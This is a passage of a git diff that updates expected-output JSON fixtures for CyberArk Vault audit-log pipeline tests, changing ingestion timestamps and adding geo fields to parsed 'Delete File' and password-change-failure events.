@@ -203,7 +203,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873546400Z", + "ingested": "2021-12-14T14:42:35.693140504Z", "original": "\u003c5\u003e1 2021-03-08T19:20:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:04\",\"IsoTimestamp\":\"2021-03-08T19:20:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"Root\\\\Test_4\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" @@ -216,6 +216,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -262,7 +271,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873550500Z", + "ingested": "2021-12-14T14:42:35.693140936Z", "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" 
@@ -330,7 +339,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873555300Z", + "ingested": "2021-12-14T14:42:35.693141327Z", "original": "\u003c5\u003e1 2021-03-11T19:32:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:32:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:32:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_1\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_2\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_3\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_4\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"_PSMLiveSessions_5\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:32:12\",\"IsoTimestamp\":\"2021-03-11T19:32:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"_PSMLiveSessions_1\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_2\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_3\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_4\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_5\",\"Value\":\"\"}]}}}}", "code": "52", "kind": "event" 
@@ -406,7 +415,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873560700Z", + "ingested": "2021-12-14T14:42:35.693141735Z", "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.14\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.14\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" 
@@ -480,7 +489,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873565700Z", + "ingested": "2021-12-14T14:42:35.693142145Z", "original": "\u003c5\u003e1 2021-03-11T21:06:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.65\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"ASR-CYBERARK-WI\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:50\",\"IsoTimestamp\":\"2021-03-11T21:06:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.65\"},{\"Name\":\"LogonDomain\",\"Value\":\"ASR-CYBERARK-WI\"}]}}}}", "code": "52", "kind": "event" 
@@ -554,7 +563,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873570100Z", + "ingested": "2021-12-14T14:42:35.693142531Z", "original": "\u003c5\u003e1 2021-03-14T12:10:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:10:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:10:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:10:17\",\"IsoTimestamp\":\"2021-03-14T12:10:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "52", "kind": "event" 
@@ -632,7 +641,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873574800Z", + "ingested": "2021-12-14T14:42:35.693142925Z", "original": "\u003c5\u003e1 2021-03-15T15:09:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:09:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:09:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:09:00\",\"IsoTimestamp\":\"2021-03-15T15:09:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-Oracle-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" 
@@ -710,7 +719,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873578900Z", + "ingested": "2021-12-14T14:42:35.693143315Z", "original": "\u003c5\u003e1 2021-03-15T15:13:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:13:59\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:13:59Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:13:59\",\"IsoTimestamp\":\"2021-03-15T15:13:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json index 86bc4413574..41582f6780c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json 
@@ -92,7 +92,7 @@ "event": { "severity": 7, "reason": "Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002", - "ingested": "2021-12-09T13:37:07.987594400Z", + "ingested": "2021-12-14T14:42:36.839714470Z", "original": "\u003c7\u003e1 2021-03-25T12:00:08Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 08:00:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T12:00:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e57\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux Accounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
